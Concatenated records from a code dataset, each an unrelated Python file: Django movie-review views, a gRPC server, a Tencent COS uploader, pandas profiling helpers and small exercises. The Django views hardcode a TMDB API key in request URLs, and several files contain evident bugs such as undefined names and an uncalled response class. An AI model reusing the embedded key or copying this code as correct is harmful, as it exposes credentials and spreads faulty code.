scipy.io.loadmat(weights_path)['layers'][0]\n\n self._weights = {\n layer: MatlabWeightsParser.get_conv_layer_weights(self._data[index])\n for index, layer in enumerate(layer_names)\n if layer.startswith('conv')\n }\n\n def get_layer_weights(self, layer_name: str) -> np.ndarray:\n \"\"\"\n Gets weights for layer by name.\n :param layer_name: layer name for which need load weights.\n :return: layer weights.\n \"\"\"\n\n if layer_name not in self._weights:\n raise KeyError('Invalid layer name {}.'.format(\n layer_name\n ))\n\n return self._weights[layer_name]\n\n @staticmethod\n def get_conv_layer_weights(layer_weights: np.ndarray) -> Tuple[np.ndarray]:\n \"\"\"\n Loads convolution weights for matconvnet format into TensorFlow format.\n :param layer_weights: matconvnet weights.\n :return: TensorFlow weights.\n \"\"\"\n\n kernel_weights = layer_weights[0][0][2][0][0]\n\n # matconvnet: layer_weights are\n # [width, height, in_channels, out_channels]\n\n # tensorflow: layer_weights are\n # [height, width, in_channels, out_channels]\n\n kernel_weights = np.transpose(kernel_weights, (1, 0, 2, 3))\n\n bias_weights = np.array(layer_weights[0][0][2][0][1])\n bias_weights = bias_weights.reshape(-1)\n\n return kernel_weights, bias_weights\n","sub_path":"utils/matlab_weight_loader.py","file_name":"matlab_weight_loader.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"107900199","text":"from django.shortcuts import render,redirect,get_object_or_404\nfrom .models import Movie, Genre, Review\nfrom .forms import ReviewForm\nfrom django.views.decorators.http import require_POST\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseForbidden,HttpResponse,JsonResponse\nimport requests\nfrom django.core import serializers\nimport pprint\nfrom django.db.models import Avg, Max, Min, Sum\nfrom django.contrib.auth import get_user_model\nimport json\nfrom django.contrib import messages\n\n# Create your views here.\ndef start(request):\n return render(request,'movies/start.html')\n\ndef index(request, page_type):\n movies = Movie.objects.all()\n index_movies = Movie.objects.filter(movie_type=\"now_playing\").order_by('-popularity')[:10] \n # user_rated_movies = Movie.objects.order_by(\"-avgscore\")[:10]\n print(index_movies)\n if page_type == 1:\n top_rated_movies = Movie.objects.filter(movie_type=\"top_rated\").order_by('-popularity')[:10]\n context = {\n 'movies': top_rated_movies,\n }\n elif page_type == 2:\n popul_movies = Movie.objects.filter(movie_type=\"popular\").order_by('-popularity')[:10]\n context = {\n 'movies': popul_movies,\n }\n # elif page_type == 3:\n # if request.user.is_authenticated:\n # for movie in request.user.like_movies.all():\n # url = f'https://api.themoviedb.org/3/movie/{movie.id}/recommendations?api_key=1dfd52c8a24a0f38f40efe41c86be13b&language=ko-KR&page=1'\n # response = requests.get(url).json()\n # pprint.pprint(response[\"results\"])\n # movies = response[\"results\"]\n # pprint.pprint(movies)\n # context = {\n # 'movies': movies\n # }\n # else:\n # context = {\n # 'movies': index_movies\n # }\n else:\n context = {\n 'movies': index_movies\n }\n return render(request,'movies/index.html',context)\n\ndef detail(request,movie_pk):\n movie = get_object_or_404(Movie,pk=movie_pk)\n reviewform = ReviewForm()\n avg_score = 0\n reviews = Review.objects.filter(movie_id=movie_pk)\n\n url = f'https://api.themoviedb.org/3/movie/{movie_pk}/recommendations?api_key=1dfd52c8a24a0f38f40efe41c86be13b&language=ko-KR&page=1'\n response = requests.get(url).json()\n pprint.pprint(response[\"results\"])\n new_movies = response[\"results\"]\n # print(reviews.avgscore)\n # print(reviews.filter(movie_id=movie_pk).aggregate(Avg('score')))\n for review in reviews:\n avg_score += review.score\n if reviews.count() > 0:\n avg_score /= reviews.count()\n avg_score = round(avg_score, 1)\n else:\n avg_score = 0\n peoples = []\n casts = movie.cast.all()\n for cast in casts:\n people = People.objects.filter(id=cast.id).first()\n if people:\n peoples.append(people)\n context = {\n 'movie' : movie,\n 'new_movies': new_movies,\n 'form' : reviewform,\n 'avg_score': avg_score,\n 'peoples': peoples\n }\n return render(request,'movies/detail.html', context)\n\n@login_required\ndef review(request, movie_pk):\n reviews = Review.objects.filter(movie_id=movie_pk)\n movie = get_object_or_404(Movie,pk=movie_pk)\n reviewForm = ReviewForm(request.POST)\n if reviewForm.is_valid():\n review = reviewForm.save(commit=False)\n review.movie_id = movie_pk\n review.user = request.user\n # movie.avgscore = reviews.aggregate(Avg('score'))\n # print(movie.avgscore)\n review.save()\n return redirect('movies:detail', movie_pk)\n context = {\n 'movie' : movie, \n 'form' : reviewForm\n }\n return render(request,'movies/detail.html', context)\n \n@require_POST\ndef review_delete(request, movie_pk, review_pk):\n review = Review.objects.get(pk=review_pk)\n if request.user == review.user:\n review.delete()\n messages.success(request, '댓글이 삭제되었습니다.')\n return redirect('movies:detail', movie_pk)\n else:\n return HttpResponseForbidden\n\ndef review_update(request, movie_pk, review_pk):\n review = get_object_or_404(Review, pk=review_pk)\n review.content = request.POST.get('content') or review.content or ''\n review.score = request.POST.get('score') or review.score\n review.save()\n return redirect('movies:detail',movie_pk)\n\n@login_required\ndef like(request, movie_pk):\n if request.is_ajax():\n movie = get_object_or_404(Movie, pk=movie_pk)\n is_liked = True\n if request.user in movie.like_users.all():\n movie.like_users.remove(request.user)\n is_liked = False\n else:\n movie.like_users.add(request.user)\n is_liked = True\n context = {\n 'is_liked' : is_liked,\n 'like_count' : movie.like_users.count()\n }\n return JsonResponse(context)\n else:\n return HttpResponseForbidden\n\n\ndef recommand(request):\n movie = Movie.objects.all()\n context = {\n 'movies' : movies\n }\n return render(request,'movies/recommand.html',context)\n \ndef search(request):\n query = request.GET.get('search_title')\n if query:\n title_movies = Movie.objects.filter(title__icontains=query)\n description_movies = Movie.objects.filter(description__icontains=query)\n des_movies = description_movies.difference(title_movies)\n context = {\n \"title_movies\" : title_movies,\n \"des_movies\" : des_movies\n }\n return render(request,'movies/search.html',context)\n else:\n return redirect('movies:index', 0)\n","sub_path":"movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"570593505","text":"import json\n\nclass config:\n \n def __init__(self):\n with open(\"config.json\") as json_file:\n data = json.load(json_file)\n self.listen_ip = data[\"listen_ip\"]\n self.listen_port = data[\"listen_port\"]\n self.apikey = data[\"apikey\"]\n self.redis_task_ttl = data[\"redis_task_ttl\"]\n self.redis_server = data[\"redis_server\"]\n self.redis_port = data[\"redis_port\"]\n self.redis_core_q = data[\"redis_core_q\"]\n self.redis_task_timeout = data[\"redis_task_timeout\"]\n self.txtfsm_index_file = data[\"txtfsm_index_file\"]\n self.txtfsm_template_server = data[\"txtfsm_template_server\"]\n","sub_path":"backend/core/confload/confload.py","file_name":"confload.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"305805329","text":"def intersection(arrays):\n \"\"\"\n YOUR CODE HERE\n \"\"\"\n # initializing a dict to hold the key value pairs\n dict = {}\n # can be up to 10 lists in all lists\n number_of_lists = len(arrays)\n for each_list in arrays: # for each of the lists from our input (arrays)\n for each_item in each_list: # for each item of each list\n if each_item in dict: # if the item is already in the dictionary\n dict[each_item] += 1 # increase the key count\n else:\n dict[each_item] = 1 # add key count of 1 to dict if it isn't already there\n\n intersections = []\n # we have created a count of how many lists each item exists within\n for key in dict:\n # if it exists in all of them it would be equal to our \"number_of_lists\"\n if dict[key] == number_of_lists:\n # add the values that intersect to our intersection array\n intersections.append(key)\n\n return intersections\n\nif __name__ == \"__main__\":\n arrays = []\n\n arrays.append(list(range(1000000, 2000000)) + [1, 2, 3])\n arrays.append(list(range(2000000, 3000000)) + [1, 2, 3])\n arrays.append(list(range(3000000, 4000000)) + [1, 2, 3])\n\n print(intersection(arrays))\n ","sub_path":"hashtables/ex3/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"47536688","text":"#!/home/odroid/prefix/default/lib python2\n'''\nCreated on Jan 19, 2018\n\n@author: enzo\n'''\nfrom src import *\nimport matplotlib.pyplot as plt\nimport mpl_toolkits.mplot3d.axes3d as axes3d\n \ndef main():\n # Init all parts of application\n try:\n endEvent = threading.Event()\n processEvent = threading.Event()\n processEvent.clear()\n fig = plt.figure(1) # Plot figure\n ax1 = fig.gca() # Plot data\n #ax1 = fig.add_subplot(111)\n data = Data() # The data class that contains all data\n dspProcces = dsp(data,endEvent,processEvent) # The signalproccesing block\n #time.sleep(5)\n app = Application(dspProcces,data,ax1,fig,endEvent) # Terminal application\n plotevent = app.getPlotEvent()\n \n while endEvent.isSet() == False:\n time.sleep(1)\n if plotevent.isSet():\n plotevent.clear()\n plt.show()\n \n\n except (KeyboardInterrupt,SystemExit):\n app.endprocess()\nif __name__ == '__main__':\n gpsp.start() # Global gps object start\n main()\n","sub_path":"AntChar_backup_180515/Antchar/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"623728686","text":"# Copyright 2015 gRPC authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"The Python implementation of the GRPC helloworld.Greeter server.\"\"\"\n\nfrom concurrent import futures\n\nimport grpc\n\nimport helloworld_pb2\nimport helloworld_pb2_grpc\n\nfrom datetime import datetime\n\nREPLY=\"done_1\"\nPORT=4444\n\nclass Greeter(helloworld_pb2_grpc.GreeterServicer):\n def SayHello(self, request, context):\n msg=request.name\n print(\"request from the client with the message: %s\" % msg)\n if (msg==\"time\"):\n return helloworld_pb2.HelloReply(message='%s' % time())\n else:\n return helloworld_pb2.HelloReply(message='%s' % refuse())\n def SayHelloAgain(self, request_iterator, context):\n for request in request_iterator:\n print(\"streaming: request from the client with the message %s\" % request.name)\n response=helloworld_pb2.HelloReply(message='streaming: %s! ' % REPLY)\n return response\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n helloworld_pb2_grpc.add_GreeterServicer_to_server(Greeter(), server)\n server.add_insecure_port('[::]:4444')\n print(\"Server 1 is listening on port 4444 ...\")\n server.start()\n server.wait_for_termination()\n\ndef time():\n now=datetime.now()\n return now.strftime(\"%H:%M:%S\")\n\ndef refuse():\n return \"time was not requested\"\n\nif __name__ == '__main__':\n serve()\n","sub_path":"grpc/server1.py","file_name":"server1.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"493347100","text":"from PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\nfrom _actions_ import LActions\nfrom _debug_ import *\nfrom setup import * \n\nimport qrc_resources\n\nif not vars().has_key('ACTIONS'): ACTIONS = 0\n\n#----------------------------------------------------------------------\nclass LMyActions(LActions):\n\n def __init__(self, dataContainer=None, parent=None):\n super(LMyActions, self).__init__(dataContainer, parent)\n self.dataContainer = dataContainer \n self.createActions()\n self.createMenus()\n\n def createActions(self): \n super(LMyActions, self).createActions()\n self.insertARowAction = self.createAction(\"&Insert New Condition\", self.on_insertARowAction_triggered)\n self.removeARowAction = self.createAction(\"&Remove Current Condition\", self.on_removeARowAction_triggered)\n\n def createMenus(self):\n super(LMyActions, self).createMenus()\n self.contextMenuActions = [ self.insertARowAction, self.removeARowAction, ] + self.contextMenuActions\n self.contextMenu = self.getContextMenu(\"Condition Table\")\n\n #----------------------------------------------------------------------\n # Signals/Slots\n\n def on_insertARowAction_triggered(self):\n ''' Insert row '''\n numberOfRows = self.parent().tableModel.rowCount(self)\n self.parent().tableModel.insertRow(numberOfRows)\n\n def on_removeARowAction_triggered(self):\n ''' Remove row '''\n index =self.parent().tableView.currentIndex()\n row = index.row()\n self.parent().tableModel.removeRow(row)\n\n#----------------------------------------------------------------------\n# MAIN\n#----------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n pass\n \n","sub_path":"cls1/eggs/src/lti/widgets.20120401/conditiontable/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"99580908","text":"\r\nitems = input().split('|')\r\n\r\nbudget = float(input())\r\n\r\nsum_new_prices = 0\r\nnew_budget = 0\r\nsum_old_prices = 0\r\ntotal_profit = 0\r\nbought_products_list = []\r\n\r\nfor i in items:\r\n tokens = i.split('->')\r\n cloth_type = tokens[0]\r\n price = float(tokens[1])\r\n\r\n if cloth_type == 'Clothes' and price <= 50:\r\n if budget >= price:\r\n budget -= price\r\n sum_old_prices += price\r\n price = price * 1.40\r\n sum_new_prices += price\r\n bought_products_list.append(price)\r\n\r\n if cloth_type == 'Shoes' and price <= 35:\r\n if budget >= price:\r\n budget -= price\r\n sum_old_prices += price\r\n price = price * 1.40\r\n sum_new_prices += price\r\n bought_products_list.append(price)\r\n\r\n if cloth_type == 'Accessories' and price <= 20.50:\r\n if budget >= price:\r\n budget -= price\r\n sum_old_prices += price\r\n price = price * 1.40\r\n sum_new_prices += price\r\n bought_products_list.append(price)\r\n\r\ntotal_profit = sum_new_prices - sum_old_prices\r\nnew_budget = budget + sum_new_prices\r\n\r\n\r\nfor item in bought_products_list:\r\n print(f'{item:.2f}', end=' ')\r\nprint()\r\nprint(f'Profit: {total_profit:.2f}')\r\n\r\nif new_budget >= 150:\r\n print('Hello, France!')\r\nelse:\r\n print('Time to go.')\r\n","sub_path":"Python Fundamentals 2020 - 2021/03 - LISTS BASIC/Exercise - 04 - 09.py","file_name":"Exercise - 04 - 09.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"232053656","text":"# -*- coding: utf8 -*-\n# @author: yinan\n# @time: 18-7-17 下午9:38\n# @filename: util.py\nimport base64\n\nimport os\n\nfrom application import app\nimport time\nimport re\nfrom io import BytesIO\n\nfrom PIL import Image\nfrom qcloud_cos import CosConfig, CosS3Client\n\nfrom application import configs\n\n\nclass CommonUtil(object):\n @staticmethod\n def handle_img(base64_str, filename):\n image_path = configs.SYS_UPLOAD_PATH + filename\n base64_data = re.sub('^data:image/.+;base64,', '', base64_str)\n byte_data = base64.b64decode(base64_data)\n image_data = BytesIO(byte_data)\n img = Image.open(image_data)\n if image_path:\n img.convert(\"RGB\").save(image_path, 'WEBP')\n return img\n\n @staticmethod\n def upload_img(filename):\n tencent_config = configs.TENCENT_OAUTH\n image_path = configs.SYS_UPLOAD_PATH + filename\n config = CosConfig(Region=tencent_config.get('region'), Secret_id=tencent_config.get('secret_id'),\n Secret_key=tencent_config.get('secret_key')) # 获取配置对象\n client = CosS3Client(config)\n remote_name = str(int(time.time())) + '.webp'\n remote_url = 'http://{}.cosgz.myqcloud.com/{}'.format(tencent_config.get('bucket'), remote_name)\n response = None\n try:\n with open(image_path, 'rb') as fp:\n response = client.put_object(\n Bucket=tencent_config.get('bucket'),\n Body=fp.read(),\n Key=remote_name\n )\n os.remove(image_path)\n except Exception as e:\n app.logger.error('upload file to tencent error: {}'.format(e))\n if response is not None and response['ETag'] is not None:\n return remote_url\n else:\n return None\n","sub_path":"application/constant/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"399944320","text":"\n\"\"\"\nCreated on Thu Jan 10 3:08:09 2019\n@author: Deloitte Consutling, LLP\n@credits: [Donnally, Ryan rdonnally@deloitte.com,\n Michael Martin michmartin@deloitte.com,\n Whitehead, Noah nowhitehead@deloitte.com,\n Miller, Taylor taymiller@deloitte.com,\n Houdeshell, Benjamin bhoudeshell@deloitte.com,\n Han, Bryan bryhan@deloitte.com,\n Jackson, Amina amijackson@deloitte.com,\n Li, Yingquan yingquli@deloitte.com,\n Barry, Ande elbarry@deloitte.com,\n Grubb, Christopher cgrubb@deloitte.com,\n Stevens, Isaac isstevens@deloitte.com,\n Barsness, Brendan bbarsness@deloitte.com,\n Haddad, Abigail abhaddad@deloitte.com,\n Maroon, Christopher cmaroon@deloitte.com]\n@version: 0.0.1\n@maintainer: Ryan Donnally rdonnally@deloitte.com\n@compatability: Python 3.7, Pandas 0.23.4\n\n\"\"\"\n\nimport pandas as pd\n\n\n###########################################################################\n### Numeric correlations function that returns the top n column correlations\n\ndef get_correlation(df):\n # correlation_table=df.corr(method='kendall')\n z = df.corr().abs() # gets absolute values of a correlation table\n s = z.unstack() # unstacks the data into a single row\n corr_sort = s.sort_values(ascending=False, kind=\"quicksort\") # sorts the values from high to low\n new_corr_sort = (corr_sort[corr_sort != 1]).head(10) # drops the values that are 1 to 1; shows top 10 values\n return new_corr_sort\n\n\n### Show the Sample Data\ndef get_sample_of_cols(self, df):\n if self.get_columns(df) < 6:\n X = df.head()\n else:\n X = df.head().iloc[:, :5]\n return X\n\n\ndef get_fields_and_types(df):\n \"\"\"Returns a dictionary of dataframe columns and dtypes as strings\n\n :param df:\n :return:\n \"\"\"\n pass\n\n\ndef get_variable_type_counts(df):\n \"\"\"returns a dict of type: type_count key: value pairs\"\"\"\n count = df.dtypes.value_counts()\n type_count_dict = {}\n for i in count.index:\n type_count_dict[str(i)] = count[i]\n\n return type_count_dict\n\ndef get_type_counts_with_numeric(df):\n \"\"\"Returns a dict of types and type counts and includes a\n numeric type that is the sum of counts of float columns and int columns\n\n :param df:\n :return:\n \"\"\"\n type_count_dict = get_variable_type_counts(df)\n\n _numeric = []\n for key in _type_count_dict.keys():\n if 'float' in key or 'int' in key:\n _numeric.append(type_count_dict[key])\n\n _total_numeric = sum(_numeric)\n\n type_count_dict['numeric'] = _total_numeric\n\n return type_count_dict\n\n###########################################################################\n###\ndef get_data_summary(df):\n dataset_vars = {\n 'column_names': list(df.columns),\n 'col_type_dict': dict(df.dtypes),\n \"count_rows\": len(df.index),\n \"count_columns\": len(df.columns),\n \"count_missing_values\": df.isnull().sum().sum(), # sum over rows, then over columns,\n \"memoryusage_df\": df.memory_usage(index=False, deep=True).sum(),\n \"memoryusage_avg_col\": df.memory_usage(index=False, deep=True).sum()/len(df.columns),\n # \"Correlation Matrix\": self.get_correlation(df),\n\n # Why do we want to report this\n \"count_unique_values\": df.nunique().sum(),\n \"count_unique_vals_per_col\": df.nunique(axis=0),\n \"percent_unique_values\": df.nunique().sum() / (len(df.index) * len(df.columns)),\n \"percent_unique_per_col\": df.nunique(axis=0) / len(df.index),\n # \"Sample of the Data\": self.get_SampleOfData(df),\n # \"Column Names\": self.get_header_names(df),\n \"count_variable_type\": get_variable_type_counts(df),\n \"percent_missing_values\": df.isnull().sum().sum() / (len(df.index) * len(df.columns))\n }\n return dataset_vars\n\n\n\n\n###########################################################################\n### Function to convert dates into their date decimal values.\n\ndef conversion_to_decimal(date):\n return (float(date.strftime(\"%j\")) - 1) / 366 + float(date.strftime(\"%Y\"))\n\n###########################################################################\n### Function to convert date decimals to their datetime equivalents.\n\ndef conversion_to_date(date):\n year = int(date)\n rem = date - year\n\n base = datetime(year, 1, 1)\n print(base + timedelta(seconds=(base.replace(year=base.year + 1) - base).total_seconds() * rem))\n\n\ndef get_outlier_info(self, pandas_series,\n low_quantile = 0.25,\n high_quantile = 0.75,\n iqr_scale = 1.5):\n quartile_1 = pandas_series.quantile(low_quantile)\n quartile_3 = pandas_series.quantile(high_quantile)\n iqr = quartile_3 - quartile_1\n lower_bound = quartile_1 - (iqr * iqr_scale)\n upper_bound = quartile_3 + (iqr * iqr_scale)\n\n high_count = pandas_series[pandas_series > upper_bound].count()\n low_count = pandas_series[pandas_series < lower_bound].count()\n\n outlier_dict = {'High Cutoff': upper_bound,\n 'Low Cutoff': lower_bound,\n 'High Count': high_count,\n 'Low Count': low_count}\n\n return outlier_dict\n\n\n\n# @TODO: add imputation methods e.g. mean, Gaussian sample, regression, etc.\n# @TODO: sort out why there should separate outlier calculations for different dtypes\ndef outlier_detection(pd_column, impute=True, impute_type = 'mode'):\n \"\"\"\n\n :param pd_column: column from a pandas dataframe\n :param impute: (bool) default = True, whether missing data will be imputed\n :param impute_type:\n :return:\n \"\"\"\n if 'int' in str(pd_column.dtype) or 'float' in (str(pd_column.dtype)):\n if impute:\n if impute_type == 'mode':\n pd_column.fillna(pd.mode()[0], inplace=True)\n outlier_dict = get_outlier_info(pd_column)\n return outlier_dict\n\n else:\n outlier_dict = get_outlier_info(pd_column)\n return outlier_dict\n\n else:\n pass\n\n return outlier_dict\n\n# Support Functions for Datetime\n\n###########################################################################\n### This function is called by datetime_stats - it finds the largest value (year,month,day etc) that changes over the field.\n### Inputs are the min/max from a datetime field, output is a string specifying the largest value that changes\n\ndef largest_value_change(value_min, value_max):\n ValueRange = value_max - value_min\n if ValueRange.days > 365:\n LargeValue = 'Years'\n elif ValueRange.days <= 365 and ValueRange.days > 31:\n LargeValue = 'Months'\n elif ValueRange.days <= 365 and ValueRange.seconds > 86400:\n LargeValue = 'Days'\n elif ValueRange.days == 0 and ValueRange.seconds <= 86400 and ValueRange.seconds > 3600:\n LargeValue = 'Hours'\n elif ValueRange.days == 0 and ValueRange.seconds <= 3600 and ValueRange.seconds > 60:\n LargeValue = 'Minutes'\n elif ValueRange.days == 0 and ValueRange.seconds <= 60 and ValueRange.dt.second > 0:\n LargeValue = 'Seconds'\n else:\n LargeValue = 'Less Than 1 Second'\n return LargeValue\n\n###########################################################################\n### Creates a dict with a frequency distribution of dates by month\n\ndef month_count_dict_create(Field):\n MonthCountDict = {'Jan': 0, 'Feb': 0, 'Mar': 0, 'Apr': 0, 'May': 0, 'Jun': 0, 'Jul': 0, 'Aug': 0, 'Sep': 0,\n 'Oct': 0, 'Nov': 0, 'Dec': 0}\n RefDict = {1: 'Jan', 2: 'Feb', 3: 'Mar', 4: 'Apr', 5: 'May', 6: 'Jun', 7: 'Jul', 8: 'Aug', 9: 'Sep', 10: 'Oct',\n 11: 'Nov', 12: 'Dec'}\n MonthCountDictPrelim = Field.dt.month.value_counts()\n for key in MonthCountDictPrelim.index:\n MonthCountDict[RefDict[key]] = MonthCountDictPrelim[key]\n return MonthCountDict\n\n###########################################################################\n### Creates a dict with a frequency distribution of dates by day of week\ndef weekday_count_dict_create(Field):\n WeekdayCountDict = {'Mon': 0, 'Tue': 0, 'Wed': 0, 'Thu': 0, 'Fri': 0, 'Sat': 0, 'Sun': 0}\n RefDict = {0: 'Mon', 1: 'Tue', 2: 'Wed', 3: 'Thu', 4: 'Fri', 5: 'Sat', 6: 'Sun'}\n WeekdayCountDictPrelim = Field.dt.weekday.value_counts()\n for key in WeekdayCountDictPrelim.index:\n WeekdayCountDict[RefDict[key]] = WeekdayCountDictPrelim[key]\n return WeekdayCountDict\n\n########################################################################\n### Primary function to run object field analysis\n\ndef text_stats(Field):\n # print(Field)\n CleanField = Field[Field.notnull()]\n text_len = CleanField.apply(lambda x: len(str(x)))\n word_count_split = CleanField.apply(lambda x: str(x).split())\n word_count_len = word_count_split.apply(lambda x: len(str(x)))\n word_list = [x for row in word_count_split for x in row]\n word_df = pd.DataFrame(word_list, columns=['Words'])\n word_counts = word_df['Words'].value_counts()\n counts = CleanField.value_counts()\n \"\"\"\n if len(counts) == 1:\n mode_value = counts\n\n else:\n mode_value = 'multiple'\n\n if word_counts[0] != word_counts[1] or len(counts) == 1:\n mode_word = word_counts.keys()[0]\n else:\n mode_word = 'multiple'\n \"\"\"\n special_character = 0\n for x in word_list:\n if x.isalpha() == False and x.isdigit() == False:\n special_character = special_character + 1\n\n TextDict = {}\n TextDict['name_field'] = Field.name\n TextDict['type_category'] = 'object'\n TextDict['dtype'] = Field.dtype\n TextDict['count_records'] = len(CleanField)\n TextDict['memoryusage_col'] = Field.memory_usage(deep=True)\n TextDict['count_missing'] = Field.isna().sum()\n TextDict['count_unique'] = Field.nunique()\n if TextDict['count_records'] > 0:\n TextDict['percent_missing'] = TextDict['count_missing'] / TextDict['count_records']\n TextDict['percent_unique'] = TextDict['count_unique'] / TextDict['count_records']\n else:\n TextDict['percent_missing'] = 0\n TextDict['percent_unique'] = 0\n TextDict['max'] = [text_len.max(), word_count_len.max()]\n TextDict['min'] = [text_len.min(), word_count_len.min()]\n TextDict['mean'] = [text_len.mean(), word_count_len.mean()]\n TextDict['mode'] = [text_len.mode()[0], word_count_len.mode()[0]]\n TextDict['q_25'] = [text_len.quantile(q=.25), word_count_len.quantile(q=.25)]\n TextDict['q_50'] = [text_len.quantile(q=.50), word_count_len.quantile(q=.50)]\n TextDict['q_75'] = [text_len.quantile(q=.75), word_count_len.quantile(q=.75)]\n TextDict['median_length'] = [text_len.median(), word_count_len.median()]\n TextDict['std_length'] = [text_len.std(), word_count_len.std()]\n TextDict['mad'] = [text_len.mad(), word_count_len.mad()]\n TextDict['sem'] = [text_len.sem(), word_count_len.sem()]\n TextDict['var'] = [text_len.var(), word_count_len.var()]\n TextDict['kurt'] = [text_len.kurtosis(), word_count_len.kurtosis()]\n TextDict['skew'] = [text_len.skew(), word_count_len.skew()]\n TextDict['autocorr'] = [text_len.autocorr(), word_count_len.autocorr()]\n\n TextDict['Total_Word_Count'] = sum(x.isalpha() for x in word_list)\n TextDict['Total_Number_Count'] = sum(x.isdigit() for x in word_list)\n TextDict['Total_Special_Count'] = special_character\n TextDict['word_list'] = word_list\n\n return (TextDict)\n\n###########################################################################\n### Primary function to run datetime field analysis\n\ndef datetime_stats(Field):\n CleanField = Field[Field.notnull()]\n # FieldNum = len(Field)\n DatetimeDict = {}\n\n DatetimeDict['memoryusage_col'] = Field.memory_usage(deep=True)\n DatetimeDict['name_field'] = Field.name\n DatetimeDict['type_category'] = 'datetime'\n DatetimeDict['dtype'] = Field.dtype\n DatetimeDict['count_records'] = len(CleanField)\n DatetimeDict['count_missing'] = Field.isna().sum()\n DatetimeDict['count_unique'] = Field.nunique()\n if DatetimeDict['count_records'] > 0:\n DatetimeDict['percent_missing'] = DatetimeDict['count_missing'] / DatetimeDict['count_records']\n DatetimeDict['percent_unique'] = DatetimeDict['count_unique'] / DatetimeDict['count_records']\n else:\n DatetimeDict['percent_missing'] = 0\n DatetimeDict['percent_unique'] = 0\n\n\n DatetimeDict['min'] = CleanField.min()\n DatetimeDict['max'] = CleanField.max()\n DatetimeDict['range'] = (CleanField.max() - CleanField.min())\n NumDates = CleanField.astype('int64')\n DatetimeDict['std'] = pd.to_timedelta(NumDates.std())\n DatetimeDict['kurt'] = NumDates.kurtosis()\n DatetimeDict['skew'] = NumDates.skew()\n DatetimeDict['mean'] = pd.to_datetime(NumDates.mean())\n DatetimeDict['median'] = pd.to_datetime(NumDates.median())\n DatetimeDict['mode'] = str(CleanField.mode()[0])\n DatetimeDict['q_25'] = pd.to_datetime(NumDates.quantile(q=.25))\n DatetimeDict['q_50'] = pd.to_datetime(NumDates.quantile(q=.50))\n DatetimeDict['q_75'] = pd.to_datetime(NumDates.quantile(q=.75))\n DatetimeDict['iqr'] = DatetimeDict['q_75'] - DatetimeDict['q_25']\n # DatetimeDict['YearCountDict'] = CleanField.dt.year.value_counts().to_dict()\n # DatetimeDict['MonthCountDict'] = self.month_count_dict_create(CleanField)\n # DatetimeDict['DayCountDict'] = CleanField.dt.day.value_counts().to_dict()\n # DatetimeDict['WeekdayCountDict'] = self.weekday_count_dict_create(CleanField)\n # This is the largest value that changes over the series, from years to days\n DatetimeDict['laregest_measureable_value'] = largest_value_change(DatetimeDict['min'], DatetimeDict['max'])\n # DatetimeDict['outlier'] = self.outlier_detection(Field,'Date')\n return DatetimeDict\n\n###########################################################################\n### Primary function to run numeric field analysis\n\ndef numeric_stats(Field):\n CleanField = Field[Field.notnull()]\n NumericDict = {}\n\n NumericDict['memeryusage_col'] = Field.memory_usage(deep=True)\n NumericDict['name_field'] = Field.name\n NumericDict['type_category'] = 'numeric'\n NumericDict['dtype'] = Field.dtype\n NumericDict['count_records'] = len(CleanField)\n NumericDict['count_missing'] = Field.isna().sum()\n NumericDict['count_unique'] = Field.nunique()\n if NumericDict['count_records'] > 0:\n NumericDict['percent_missing'] = NumericDict['count_missing'] / NumericDict['count_records']\n NumericDict['percent_unique'] = NumericDict['count_unique'] / NumericDict['count_records']\n else:\n NumericDict['percent_missing'] = 0\n NumericDict['percent_unique'] = 0\n\n\n NumericDict['min'] = CleanField.min()\n NumericDict['max'] = CleanField.max()\n NumericDict['median'] = CleanField.median()\n NumericDict['mean'] = CleanField.mean()\n NumericDict['std'] = CleanField.std()\n NumericDict['mad'] = CleanField.mad()\n NumericDict['sem'] = CleanField.sem()\n NumericDict['var'] = CleanField.var()\n NumericDict['q_25'] = CleanField.quantile(q=.25)\n NumericDict['q_50'] = CleanField.quantile(q=.5)\n NumericDict['q_75'] = CleanField.quantile(q=.75)\n NumericDict['kurt'] = CleanField.kurtosis()\n NumericDict['skew'] = CleanField.skew()\n # Need to come up with how many Modes we will be accepting. Something \"ID\" is unique therefore shows VERY long list.\n NumericDict['mode'] = CleanField.mode()[0]\n # NumericDict['outlier'] = self.outlier_detection(Field,'Numeric')\n return NumericDict\n\n###########################################################################\n### The primary Variable function - Dataframe in, Dictionary of fields and stats out. the output for each type is a series\n###vbut can be easily made into a dictionary by changeing the variable_stats_dict to call the dictionary form of each type.\n\ndef variable_stats(dataframe):\n\n df_numeric = dataframe.select_dtypes(include=['int64', 'float64'])\n numeric_stat = df_numeric.apply(lambda x: 